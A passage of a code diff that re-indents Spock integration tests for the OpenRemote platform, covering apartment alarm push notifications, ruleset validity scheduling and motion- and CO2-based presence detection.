-        advancePseudoClock((fromTo[1].getTime()-getClockTimeOf(container))+10000, TimeUnit.MILLISECONDS, container)
-
-        then: "the ruleset status should be paused"
-        conditions.eventually {
-            assert rulesetDeployment.status == RulesetStatus.PAUSED
-        }
-
-        when: "time advances to within the next valid time period"
-        fromTo = getOccurrenceFromTo(baseTime, 1)
-        advancePseudoClock(fromTo[0].getTime() - getClockTimeOf(container) + (61*60000), TimeUnit.MILLISECONDS, container)
-
-        then: "the ruleset status should be un-paused"
-        conditions.eventually {
-            assert rulesetDeployment.status == RulesetStatus.DEPLOYED
-        }
-
-        when: "time advances past the second expiry the ruleset is paused again"
-        advancePseudoClock(fromTo[1].getTime() - getClockTimeOf(container) + (45*60000), TimeUnit.MILLISECONDS, container)
-
-        then: "the ruleset status should be expired"
-        conditions.eventually {
-            assert rulesetDeployment.status == RulesetStatus.EXPIRED
-        }
-
-        cleanup: "the mock is removed"
-        notificationService.notificationHandlerMap.put(pushNotificationHandler.getTypeName(), pushNotificationHandler)
+    expect: "the rule engines to become available and be running"
+    conditions.eventually {
+      apartment1Engine = rulesService.assetEngines.get(managerTestSetup.apartment1Id)
+      assert apartment1Engine != null
+      assert apartment1Engine.isRunning()
+      assert apartment1Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_1
     }
+
+    and: "the alarm enabled, presence detected flag of room should not be set"
+    def apartment1Asset = assetStorageService.find(managerTestSetup.apartment1Id, true)
+    assert !apartment1Asset.getAttribute("alarmEnabled").get().value.orElse(null)
+    def livingRoomAsset = assetStorageService.find(managerTestSetup.apartment1LivingroomId, true)
+    assert !livingRoomAsset.getAttribute("presenceDetected").orElse(null).value.orElse(null)
+
+    and: "an authenticated test user"
+    def realm = "building"
+    def accessToken = authenticate(
+            container,
+            realm,
+            KEYCLOAK_CLIENT_ID,
+            "testuser3",
+            "testuser3"
+            )
+
+    and: "the notification and console resources"
+    def authenticatedConsoleResource = getClientApiTarget(serverUri(serverPort), realm, accessToken).proxy(ConsoleResource.class)
+
+    when: "a console is registered by the test user"
+    def consoleRegistration = new ConsoleRegistration(null,
+            "Test Console",
+            "1.0",
+            "Android 7.0",
+            new HashMap<String, ConsoleProvider>(
+                    geofence: new ConsoleProvider(
+                            ORConsoleGeofenceAssetAdapter.NAME,
+                            true,
+                            false,
+                            false,
+                            false,
+                            false,
+                            null
+                            ),
+                    push: new ConsoleProvider(
+                            "fcm",
+                            true,
+                            true,
+                            true,
+                            true,
+                            false,
+                            ((Map) parse("{\"token\": \"23123213ad2313b0897efd\"}").orElse(null)
+                            ))
+                    ),
+            "",
+            ["manager"] as String[])
+    def returnedConsoleRegistration = authenticatedConsoleResource.register(null, consoleRegistration)
+
+    then: "the console should be registered"
+    assert returnedConsoleRegistration.id != null
+
+    when: "the alarm is enabled"
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(
+                    managerTestSetup.apartment1Id, "alarmEnabled", true
+                    ))
+
+    then: "that value should be stored"
+    conditions.eventually {
+      def asset = assetStorageService.find(managerTestSetup.apartment1Id, true)
+      assert asset.getAttribute("alarmEnabled").get().getValue().orElse(false)
+    }
+
+    when: "the presence is detected in Living room of apartment 1"
+    ((SimulatorProtocol)agentService.getProtocolInstance(managerTestSetup.apartment1ServiceAgentId)).updateSensor(
+            new AttributeEvent(managerTestSetup.apartment1LivingroomId, "presenceDetected", true)
+            )
+
+    then: "that value should be stored"
+    conditions.eventually {
+      def asset = assetStorageService.find(managerTestSetup.apartment1LivingroomId, true)
+      assert asset.getAttribute("presenceDetected").get().value.orElse(null)
+    }
+
+    and: "the user should be notified"
+    conditions.eventually {
+      assert notificationIds.size() == 1
+      assert targetTypes[0] == Notification.TargetType.ASSET
+      assert targetIds[0] == returnedConsoleRegistration.id
+      def pushMessage = (PushNotificationMessage) messages[0]
+      assert pushMessage.title == "Apartment Alarm"
+      assert pushMessage.body.startsWith("Aanwezigheid in Living Room")
+      assert pushMessage.buttons.size() == 2
+      assert pushMessage.buttons[0].title == "Details"
+      assert pushMessage.buttons[0].action.url == "#security"
+      assert pushMessage.buttons[0].action.httpMethod == null
+      assert pushMessage.buttons[0].action.data == null
+      assert !pushMessage.buttons[0].action.openInBrowser
+      assert !pushMessage.buttons[0].action.silent
+      assert pushMessage.buttons[1].title == "Alarm uit"
+      assert pushMessage.buttons[1].action.url == getWriteAttributeUrl(new AttributeRef(managerTestSetup.apartment1Id, "alarmEnabled"))
+      assert pushMessage.buttons[1].action.httpMethod == WRITE_ATTRIBUTE_HTTP_METHOD
+      assert !ValueUtil.getBoolean(pushMessage.buttons[1].action.data).orElse(true)
+      assert !pushMessage.buttons[1].action.openInBrowser
+      assert pushMessage.buttons[1].action.silent
+    }
+
+    when: "time moves on and other events happen that trigger evaluation in the rule engine"
+    advancePseudoClock(20, TimeUnit.MINUTES, container)
+    ((SimulatorProtocol)agentService.getProtocolInstance(managerTestSetup.apartment1ServiceAgentId)).updateSensor(
+            new AttributeEvent(managerTestSetup.apartment1LivingroomId, "co2Level", 444)
+            )
+
+    then: "still only one notification should have been sent"
+    conditions.eventually {
+      def asset = assetStorageService.find(managerTestSetup.apartment1LivingroomId, true)
+      assert asset.getAttribute("co2Level").get().value.orElse(null) == 444
+      assert notificationIds.size() == 1
+    }
+
+    when: "time moves on more than the alarm silence duration"
+    advancePseudoClock(30, TimeUnit.MINUTES, container)
+
+    then: "another notification should be sent"
+    conditions.eventually {
+      assert notificationIds.size() == 2
+    }
+
+    when: "the presence is no longer triggered in Living room of apartment 1"
+    advancePseudoClock(5, TimeUnit.SECONDS, container)
+    ((SimulatorProtocol)agentService.getProtocolInstance(managerTestSetup.apartment1ServiceAgentId)).updateSensor(
+            new AttributeEvent(managerTestSetup.apartment1LivingroomId, "presenceDetected", false)
+            )
+
+    then: "that value should be stored"
+    conditions.eventually {
+      def asset = assetStorageService.find(managerTestSetup.apartment1LivingroomId, true)
+      assert !asset.getAttribute("presenceDetected").get().value.orElse(null)
+    }
+
+    when: "time moves on"
+    advancePseudoClock(40, TimeUnit.MINUTES, container)
+
+    then: "still only two notifications should have been sent"
+    conditions.eventually {
+      assert notificationIds.size() == 2
+    }
+
+    when: "a validity period is added to the ruleset that enables the ruleset for the next day of the week repeating for 2 weeks"
+    stopPseudoClock()
+    def baseTime = getClockTimeOf(container)
+    def fromTo = getOccurrenceFromTo(baseTime, 0)
+    def recur = new Recur<>(Frequency.WEEKLY, 2)
+    def validity = new CalendarEvent(fromTo[0], fromTo[1], recur)
+    ruleset.setValidity(validity)
+    rulesetStorageService.merge(ruleset)
+    ruleset = rulesetStorageService.find(AssetRuleset.class, ruleset.id)
+
+    then: "the ruleset should have saved successfully and the validity should also have been stored"
+    assert ruleset != null
+    assert ruleset.getValidity() != null
+    assert ruleset.getValidity().getNextOrActiveFromTo(new java.util.Date(getClockTimeOf(container))).key == fromTo[0].getTime()
+    assert ruleset.getValidity().getNextOrActiveFromTo(new java.util.Date(getClockTimeOf(container))).value == fromTo[1].getTime()
+    assert ruleset.getValidity().getRecurrence() != null
+
+    and: "the ruleset state should be deployed and paused"
+    RulesetDeployment rulesetDeployment
+    conditions.eventually {
+      apartment1Engine = rulesService.assetEngines.get(managerTestSetup.apartment1Id)
+      assert apartment1Engine != null
+      assert apartment1Engine.isRunning()
+      assert apartment1Engine.deployments.size() == 1
+      rulesetDeployment = apartment1Engine.deployments.get(ruleset.getId())
+      assert rulesetDeployment != null
+      assert rulesetDeployment.status == RulesetStatus.PAUSED
+    }
+
+    when: "time advances to within the first valid time period"
+    advancePseudoClock(fromTo[0].getTime()-getClockTimeOf(container)+10000, TimeUnit.MILLISECONDS, container)
+
+    then: "the ruleset status should become un-paused"
+    conditions.eventually {
+      assert rulesetDeployment.status == RulesetStatus.DEPLOYED
+    }
+
+    when: "time advances past the first expiry the ruleset is paused again"
+    advancePseudoClock((fromTo[1].getTime()-getClockTimeOf(container))+10000, TimeUnit.MILLISECONDS, container)
+
+    then: "the ruleset status should be paused"
+    conditions.eventually {
+      assert rulesetDeployment.status == RulesetStatus.PAUSED
+    }
+
+    when: "time advances to within the next valid time period"
+    fromTo = getOccurrenceFromTo(baseTime, 1)
+    advancePseudoClock(fromTo[0].getTime() - getClockTimeOf(container) + (61*60000), TimeUnit.MILLISECONDS, container)
+
+    then: "the ruleset status should be un-paused"
+    conditions.eventually {
+      assert rulesetDeployment.status == RulesetStatus.DEPLOYED
+    }
+
+    when: "time advances past the second expiry the ruleset is paused again"
+    advancePseudoClock(fromTo[1].getTime() - getClockTimeOf(container) + (45*60000), TimeUnit.MILLISECONDS, container)
+
+    then: "the ruleset status should be expired"
+    conditions.eventually {
+      assert rulesetDeployment.status == RulesetStatus.EXPIRED
+    }
+
+    cleanup: "the mock is removed"
+    notificationService.notificationHandlerMap.put(pushNotificationHandler.getTypeName(), pushNotificationHandler)
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/rules/residence/ResidencePresenceDetectionTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/rules/residence/ResidencePresenceDetectionTest.groovy
@@ -42,290 +42,301 @@ import static org.openremote.setup.integration.ManagerTestSetup.DEMO_RULE_STATES
 @Ignore
 class ResidencePresenceDetectionTest extends Specification implements ManagerContainerTrait {
 
-    def "Presence detection with motion sensor"() {
+  def "Presence detection with motion sensor"() {
 
-        given: "the container environment is started"
-        def conditions = new PollingConditions(timeout: 30, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def rulesService = container.getService(RulesService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        def simulatorProtocol = container.getService(SimulatorProtocol.class)
-        RulesEngine apartment1Engine = null
+    given: "the container environment is started"
+    def conditions = new PollingConditions(timeout: 30, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def rulesService = container.getService(RulesService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    def simulatorProtocol = container.getService(SimulatorProtocol.class)
+    RulesEngine apartment1Engine = null
 
-        and: "some rules"
-        Ruleset ruleset = new AssetRuleset(
+    and: "some rules"
+    Ruleset ruleset = new AssetRuleset(
             managerTestSetup.apartment1Id,
             "Demo Apartment - Presence Detection with motion and CO2 sensors",
             Ruleset.Lang.GROOVY,
             getClass().getResource("/org/openremote/test/rules/ResidencePresenceDetection.groovy").text)
-        rulesetStorageService.merge(ruleset)
+    rulesetStorageService.merge(ruleset)
 
-        expect: "the rule engines to become available and be running"
-        conditions.eventually {
-            apartment1Engine = rulesService.assetEngines.get(managerTestSetup.apartment1Id)
-            assert apartment1Engine != null
-            assert apartment1Engine.isRunning()
-            assert apartment1Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_1
-        }
+    expect: "the rule engines to become available and be running"
+    conditions.eventually {
+      apartment1Engine = rulesService.assetEngines.get(managerTestSetup.apartment1Id)
+      assert apartment1Engine != null
+      assert apartment1Engine.isRunning()
+      assert apartment1Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_1
+    }
 
-        and: "the presence detected flag and timestamp should not be set"
-        conditions.eventually {
-            def apartment = assetStorageService.find(managerTestSetup.apartment1Id, true)
-            assert !apartment.getAttribute("presenceDetected").get().getValue().isPresent()
-            def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
-            assert !kitchen.getAttribute("presenceDetected").get().getValue().isPresent()
-            assert !kitchen.getAttribute("lastPresenceDetected").get().getValue().isPresent()
-            def hallway = assetStorageService.find(managerTestSetup.apartment1HallwayId, true)
-            assert !hallway.getAttribute("presenceDetected").get().getValue().isPresent()
-            assert !hallway.getAttribute("lastPresenceDetected").get().getValue().isPresent()
-        }
+    and: "the presence detected flag and timestamp should not be set"
+    conditions.eventually {
+      def apartment = assetStorageService.find(managerTestSetup.apartment1Id, true)
+      assert !apartment.getAttribute("presenceDetected").get().getValue().isPresent()
+      def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
+      assert !kitchen.getAttribute("presenceDetected").get().getValue().isPresent()
+      assert !kitchen.getAttribute("lastPresenceDetected").get().getValue().isPresent()
+      def hallway = assetStorageService.find(managerTestSetup.apartment1HallwayId, true)
+      assert !hallway.getAttribute("presenceDetected").get().getValue().isPresent()
+      assert !hallway.getAttribute("lastPresenceDetected").get().getValue().isPresent()
+    }
 
-        when: "motion sensor is triggered in all rooms"
-        double expectedLastPresenceDetected = getClockTimeOf(container)
-        def kitchenMotionSensorEvent = new AttributeEvent(
-                managerTestSetup.apartment1KitchenId, "motionSensor", 1
-        )
-        simulatorProtocol.updateSensor(kitchenMotionSensorEvent)
-        def hallwayMotionSensorEvent = new AttributeEvent(
-                managerTestSetup.apartment1HallwayId, "motionSensor", 1
-        )
-        simulatorProtocol.updateSensor(hallwayMotionSensorEvent)
+    when: "motion sensor is triggered in all rooms"
+    double expectedLastPresenceDetected = getClockTimeOf(container)
+    def kitchenMotionSensorEvent = new AttributeEvent(
+            managerTestSetup.apartment1KitchenId, "motionSensor", 1
+            )
+    simulatorProtocol.updateSensor(kitchenMotionSensorEvent)
+    def hallwayMotionSensorEvent = new AttributeEvent(
+            managerTestSetup.apartment1HallwayId, "motionSensor", 1
+            )
+    simulatorProtocol.updateSensor(hallwayMotionSensorEvent)
 
-        then: "presence should be detected in all rooms"
-        conditions.eventually {
-            def apartment = assetStorageService.find(managerTestSetup.apartment1Id, true)
-            assert apartment.getAttribute("presenceDetected").flatMap{it.value}.orElse(false)
-            def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
-            assert kitchen.getAttribute("presenceDetected").flatMap{it.value}.orElse(false)
-            assert kitchen.getAttribute("lastPresenceDetected").flatMap{it.value}.orElse(0d) == expectedLastPresenceDetected
-            def hallway = assetStorageService.find(managerTestSetup.apartment1HallwayId, true)
-            assert hallway.getAttribute("presenceDetected").flatMap{it.value}.orElse(false)
-            assert hallway.getAttribute("lastPresenceDetected").flatMap{it.value}.orElse(0d) == expectedLastPresenceDetected
-        }
+    then: "presence should be detected in all rooms"
+    conditions.eventually {
+      def apartment = assetStorageService.find(managerTestSetup.apartment1Id, true)
+      assert apartment.getAttribute("presenceDetected").flatMap{it.value}.orElse(false)
+      def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
+      assert kitchen.getAttribute("presenceDetected").flatMap{it.value}.orElse(false)
+      assert kitchen.getAttribute("lastPresenceDetected").flatMap{
+        it.value
+      }.orElse(0d) == expectedLastPresenceDetected
+      def hallway = assetStorageService.find(managerTestSetup.apartment1HallwayId, true)
+      assert hallway.getAttribute("presenceDetected").flatMap{it.value}.orElse(false)
+      assert hallway.getAttribute("lastPresenceDetected").flatMap{
+        it.value
+      }.orElse(0d) == expectedLastPresenceDetected
+    }
 
-        when: "time advances"
-        advancePseudoClock(5, MINUTES, container)
+    when: "time advances"
+    advancePseudoClock(5, MINUTES, container)
 
-        and: "motion sensor is triggered a room again"
-        double expectedLastPresenceDetected2 = getClockTimeOf(container)
-        kitchenMotionSensorEvent = new AttributeEvent(
-                managerTestSetup.apartment1KitchenId, "motionSensor", 1
-        )
-        simulatorProtocol.updateSensor(kitchenMotionSensorEvent)
+    and: "motion sensor is triggered a room again"
+    double expectedLastPresenceDetected2 = getClockTimeOf(container)
+    kitchenMotionSensorEvent = new AttributeEvent(
+            managerTestSetup.apartment1KitchenId, "motionSensor", 1
+            )
+    simulatorProtocol.updateSensor(kitchenMotionSensorEvent)
 
-        then: "presence should be detected in all rooms and timestamp should be updated of one room"
-        conditions.eventually {
-            def apartment = assetStorageService.find(managerTestSetup.apartment1Id, true)
-            assert apartment.getAttribute("presenceDetected").flatMap{it.value}.orElse(false)
-            def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
-            assert kitchen.getAttribute("presenceDetected").flatMap{it.value}.orElse(false)
-            assert kitchen.getAttribute("lastPresenceDetected").flatMap{it.value}.orElse(0d) == expectedLastPresenceDetected2
-            def hallway = assetStorageService.find(managerTestSetup.apartment1HallwayId, true)
-            assert hallway.getAttribute("presenceDetected").flatMap{it.value}.orElse(false)
-            assert hallway.getAttribute("lastPresenceDetected").flatMap{it.value}.orElse(0d) == expectedLastPresenceDetected
-        }
+    then: "presence should be detected in all rooms and timestamp should be updated of one room"
+    conditions.eventually {
+      def apartment = assetStorageService.find(managerTestSetup.apartment1Id, true)
+      assert apartment.getAttribute("presenceDetected").flatMap{it.value}.orElse(false)
+      def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
+      assert kitchen.getAttribute("presenceDetected").flatMap{it.value}.orElse(false)
+      assert kitchen.getAttribute("lastPresenceDetected").flatMap{
+        it.value
+      }.orElse(0d) == expectedLastPresenceDetected2
+      def hallway = assetStorageService.find(managerTestSetup.apartment1HallwayId, true)
+      assert hallway.getAttribute("presenceDetected").flatMap{it.value}.orElse(false)
+      assert hallway.getAttribute("lastPresenceDetected").flatMap{
+        it.value
+      }.orElse(0d) == expectedLastPresenceDetected
+    }
 
-        when: "time advances"
-        advancePseudoClock(5, MINUTES, container)
+    when: "time advances"
+    advancePseudoClock(5, MINUTES, container)
 
-        and: "motion sensor is not triggered in a room"
-        kitchenMotionSensorEvent = new AttributeEvent(
-                managerTestSetup.apartment1KitchenId, "motionSensor", 0
-        )
-        simulatorProtocol.updateSensor(kitchenMotionSensorEvent)
+    and: "motion sensor is not triggered in a room"
+    kitchenMotionSensorEvent = new AttributeEvent(
+            managerTestSetup.apartment1KitchenId, "motionSensor", 0
+            )
+    simulatorProtocol.updateSensor(kitchenMotionSensorEvent)
 
-        then: "some presence should still be detected and timestamps are still available"
-        conditions.eventually {
-            def apartment = assetStorageService.find(managerTestSetup.apartment1Id, true)
-            assert apartment.getAttribute("presenceDetected").flatMap{it.value}.orElse(false)
-            def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
-            assert !kitchen.getAttribute("presenceDetected").flatMap{it.value}.orElse(false)
-            assert kitchen.getAttribute("lastPresenceDetected").flatMap{it.value}.orElse(0d) == expectedLastPresenceDetected2
-            def hallway = assetStorageService.find(managerTestSetup.apartment1HallwayId, true)
-            assert hallway.getAttribute("presenceDetected").flatMap{it.value}.orElse(false)
-            assert hallway.getAttribute("lastPresenceDetected").flatMap{it.value}.orElse(0d) == expectedLastPresenceDetected
-        }
+    then: "some presence should still be detected and timestamps are still available"
+    conditions.eventually {
+      def apartment = assetStorageService.find(managerTestSetup.apartment1Id, true)
+      assert apartment.getAttribute("presenceDetected").flatMap{it.value}.orElse(false)
+      def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
+      assert !kitchen.getAttribute("presenceDetected").flatMap{it.value}.orElse(false)
+      assert kitchen.getAttribute("lastPresenceDetected").flatMap{
+        it.value
+      }.orElse(0d) == expectedLastPresenceDetected2
+      def hallway = assetStorageService.find(managerTestSetup.apartment1HallwayId, true)
+      assert hallway.getAttribute("presenceDetected").flatMap{it.value}.orElse(false)
+      assert hallway.getAttribute("lastPresenceDetected").flatMap{
+        it.value
+      }.orElse(0d) == expectedLastPresenceDetected
+    }
 
-        when: "time advances"
-        advancePseudoClock(5, MINUTES, container)
+    when: "time advances"
+    advancePseudoClock(5, MINUTES, container)
 
-        and: "motion sensor is not triggered in another room"
-        hallwayMotionSensorEvent = new AttributeEvent(
-                managerTestSetup.apartment1HallwayId, "motionSensor", 0
-        )
-        simulatorProtocol.updateSensor(hallwayMotionSensorEvent)
+    and: "motion sensor is not triggered in another room"
+    hallwayMotionSensorEvent = new AttributeEvent(
+            managerTestSetup.apartment1HallwayId, "motionSensor", 0
+            )
+    simulatorProtocol.updateSensor(hallwayMotionSensorEvent)
 
-        then: "no presence should be detected but the last timestamp still available"
-        conditions.eventually {
-            def apartment = assetStorageService.find(managerTestSetup.apartment1Id, true)
-            assert !apartment.getAttribute("presenceDetected").flatMap{it.value}.orElse(false)
-            def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
-            assert !kitchen.getAttribute("presenceDetected").flatMap{it.value}.orElse(false)
-            assert kitchen.getAttribute("lastPresenceDetected").flatMap{it.value}.orElse(0d) == expectedLastPresenceDetected2
-            def hallway = assetStorageService.find(managerTestSetup.apartment1HallwayId, true)
-            assert !hallway.getAttribute("presenceDetected").flatMap{it.value}.orElse(false)
-            assert hallway.getAttribute("lastPresenceDetected").flatMap{it.value}.orElse(0d) == expectedLastPresenceDetected
-        }
+    then: "no presence should be detected but the last timestamp still available"
+    conditions.eventually {
+      def apartment = assetStorageService.find(managerTestSetup.apartment1Id, true)
+      assert !apartment.getAttribute("presenceDetected").flatMap{it.value}.orElse(false)
+      def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
+      assert !kitchen.getAttribute("presenceDetected").flatMap{it.value}.orElse(false)
+      assert kitchen.getAttribute("lastPresenceDetected").flatMap{
+        it.value
+      }.orElse(0d) == expectedLastPresenceDetected2
+      def hallway = assetStorageService.find(managerTestSetup.apartment1HallwayId, true)
+      assert !hallway.getAttribute("presenceDetected").flatMap{it.value}.orElse(false)
+      assert hallway.getAttribute("lastPresenceDetected").flatMap{
+        it.value
+      }.orElse(0d) == expectedLastPresenceDetected
+    }
+  }
 
-            }
+  def "Presence detection with motion sensor and confirmation with CO2 level"() {
 
-    def "Presence detection with motion sensor and confirmation with CO2 level"() {
+    given: "the container environment is started"
+    def conditions = new PollingConditions(timeout: 20, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def rulesService = container.getService(RulesService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    def simulatorProtocol = container.getService(SimulatorProtocol.class)
+    RulesEngine apartment1Engine = null
 
-        given: "the container environment is started"
-        def conditions = new PollingConditions(timeout: 20, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def rulesService = container.getService(RulesService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        def simulatorProtocol = container.getService(SimulatorProtocol.class)
-        RulesEngine apartment1Engine = null
-
-        and: "some rules"
-        Ruleset ruleset = new AssetRuleset(
+    and: "some rules"
+    Ruleset ruleset = new AssetRuleset(
             managerTestSetup.apartment1Id,
             "Demo Apartment - Presence Detection with motion sensor",
             Ruleset.Lang.GROOVY,
             getClass().getResource("/org/openremote/test/rules/ResidencePresenceDetection.groovy").text)
-        rulesetStorageService.merge(ruleset)
+    rulesetStorageService.merge(ruleset)
 
-        expect: "the rule engines to become available and be running"
-        conditions.eventually {
-            apartment1Engine = rulesService.assetEngines.get(managerTestSetup.apartment1Id)
-            assert apartment1Engine != null
-            assert apartment1Engine.isRunning()
-            assert apartment1Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_1
-        }
+    expect: "the rule engines to become available and be running"
+    conditions.eventually {
+      apartment1Engine = rulesService.assetEngines.get(managerTestSetup.apartment1Id)
+      assert apartment1Engine != null
+      assert apartment1Engine.isRunning()
+      assert apartment1Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_1
+    }
 
-        and: "the presence detected flag and timestamp of the room should not be set"
-        conditions.eventually {
-            def roomAsset = assetStorageService.find(managerTestSetup.apartment1LivingroomId, true)
-            assert !roomAsset.getAttribute("presenceDetected").get().getValue().isPresent()
-            assert !roomAsset.getAttribute("lastPresenceDetected").get().getValue().isPresent()
-        }
+    and: "the presence detected flag and timestamp of the room should not be set"
+    conditions.eventually {
+      def roomAsset = assetStorageService.find(managerTestSetup.apartment1LivingroomId, true)
+      assert !roomAsset.getAttribute("presenceDetected").get().getValue().isPresent()
+      assert !roomAsset.getAttribute("lastPresenceDetected").get().getValue().isPresent()
+    }
 
-        when: "motion sensor is triggered"
-        double expectedLastPresenceDetected = getClockTimeOf(container)
-        def motionSensorTrigger = new AttributeEvent(
-                managerTestSetup.apartment1LivingroomId, "motionSensor", 1
-        )
-        simulatorProtocol.updateSensor(motionSensorTrigger)
-
-        /* See rules, this leads to many false negatives when windows are open in the room
-        then: "presence should not be detected"
-        new PollingConditions(initialDelay: 3, timeout: 5, delay: 1).eventually {
-            def roomAsset = assetStorageService.find(managerTestSetup.apartment1LivingroomId, true)
-            assert !roomAsset.getAttribute("presenceDetected").get().getValue().isPresent()
-            assert !roomAsset.getAttribute("lastPresenceDetected").get().getValue().isPresent()
-        }
-
-        when: "time advances"
-        advancePseudoClock(5, MINUTES, container)
-
-        and: "the CO2 level increases"
-        // The CO2 level increments 3 times, 5 minutes apart
-        for (i in 1..3) {
-
-            def co2LevelIncrement = new AttributeEvent(
-                    managerTestSetup.apartment1LivingroomId, "co2Level", 400 + i
+    when: "motion sensor is triggered"
+    double expectedLastPresenceDetected = getClockTimeOf(container)
+    def motionSensorTrigger = new AttributeEvent(
+            managerTestSetup.apartment1LivingroomId, "motionSensor", 1
             )
-            simulatorProtocol.updateSensor(co2LevelIncrement)
+    simulatorProtocol.updateSensor(motionSensorTrigger)
 
-            // Wait for event to be processed
-            conditions.eventually {
-                assert apartment1Engine.facts.assetEvents.any() {
-                    it.fact.matches(co2LevelIncrement, SENSOR, true)
-                }
-                assert noEventProcessedIn(assetProcessingService, 500)
-            }
+    /* See rules, this leads to many false negatives when windows are open in the room
+     then: "presence should not be detected"
+     new PollingConditions(initialDelay: 3, timeout: 5, delay: 1).eventually {
+     def roomAsset = assetStorageService.find(managerTestSetup.apartment1LivingroomId, true)
+     assert !roomAsset.getAttribute("presenceDetected").get().getValue().isPresent()
+     assert !roomAsset.getAttribute("lastPresenceDetected").get().getValue().isPresent()
+     }
+     when: "time advances"
+     advancePseudoClock(5, MINUTES, container)
+     and: "the CO2 level increases"
+     // The CO2 level increments 3 times, 5 minutes apart
+     for (i in 1..3) {
+     def co2LevelIncrement = new AttributeEvent(
+     managerTestSetup.apartment1LivingroomId, "co2Level", 400 + i
+     )
+     simulatorProtocol.updateSensor(co2LevelIncrement)
+     // Wait for event to be processed
+     conditions.eventually {
+     assert apartment1Engine.facts.assetEvents.any() {
+     it.fact.matches(co2LevelIncrement, SENSOR, true)
+     }
+     assert noEventProcessedIn(assetProcessingService, 500)
+     }
+     advancePseudoClock(5, MINUTES, container)
+     }
+     */
 
-            advancePseudoClock(5, MINUTES, container)
-        }
-        */
+    then: "presence should be detected and the last motion sensor trigger is the last detected timestamp"
+    conditions.eventually {
+      def roomAsset = assetStorageService.find(managerTestSetup.apartment1LivingroomId, true)
+      assert roomAsset.getAttribute("presenceDetected").flatMap{it.value}.orElse(false)
+      assert roomAsset.getAttribute("lastPresenceDetected").flatMap{
+        it.value
+      }.orElse(0d) == expectedLastPresenceDetected
+    }
 
-        then: "presence should be detected and the last motion sensor trigger is the last detected timestamp"
-        conditions.eventually {
-            def roomAsset = assetStorageService.find(managerTestSetup.apartment1LivingroomId, true)
-            assert roomAsset.getAttribute("presenceDetected").flatMap{it.value}.orElse(false)
-            assert roomAsset.getAttribute("lastPresenceDetected").flatMap{it.value}.orElse(0d) == expectedLastPresenceDetected
-        }
-
-        when: "motion sensor is not triggered (someone might be resting in the room)"
-        def motionSensorNoTrigger = new AttributeEvent(
-                managerTestSetup.apartment1LivingroomId, "motionSensor", 0
-        )
-        simulatorProtocol.updateSensor(motionSensorNoTrigger)
-
-        and: "the CO2 level increases (someone breathing in the room)"
-        // The CO2 level increments 3 times, 5 minutes apart
-        for (i in 1..3) {
-
-            def co2LevelIncrement = new AttributeEvent(
-                    managerTestSetup.apartment1LivingroomId, "co2Level", 400 + i
+    when: "motion sensor is not triggered (someone might be resting in the room)"
+    def motionSensorNoTrigger = new AttributeEvent(
+            managerTestSetup.apartment1LivingroomId, "motionSensor", 0
             )
-            simulatorProtocol.updateSensor(co2LevelIncrement)
+    simulatorProtocol.updateSensor(motionSensorNoTrigger)
 
-            // Wait for event to be processed
-            conditions.eventually {
-                assert apartment1Engine.facts.assetEvents.any {
-                    it.fact.matches(co2LevelIncrement, SENSOR, true)
-                }
-            }
+    and: "the CO2 level increases (someone breathing in the room)"
+    // The CO2 level increments 3 times, 5 minutes apart
+    for (i in 1..3) {
 
-            advancePseudoClock(5, MINUTES, container)
+      def co2LevelIncrement = new AttributeEvent(
+              managerTestSetup.apartment1LivingroomId, "co2Level", 400 + i
+              )
+      simulatorProtocol.updateSensor(co2LevelIncrement)
+
+      // Wait for event to be processed
+      conditions.eventually {
+        assert apartment1Engine.facts.assetEvents.any {
+          it.fact.matches(co2LevelIncrement, SENSOR, true)
         }
+      }
 
-        then: "presence should be detected and the last motion sensor trigger is the last detected timestamp"
-        conditions.eventually {
-            def roomAsset = assetStorageService.find(managerTestSetup.apartment1LivingroomId, true)
-            assert roomAsset.getAttribute("presenceDetected").flatMap{it.value}.orElse(false)
-            assert roomAsset.getAttribute("lastPresenceDetected").flatMap{it.value}.orElse(0d) == expectedLastPresenceDetected
-        }
+      advancePseudoClock(5, MINUTES, container)
+    }
 
-        when: "there is no CO2 level increase for a while (nobody resting in the room)"
-        advancePseudoClock(20, MINUTES, container)
+    then: "presence should be detected and the last motion sensor trigger is the last detected timestamp"
+    conditions.eventually {
+      def roomAsset = assetStorageService.find(managerTestSetup.apartment1LivingroomId, true)
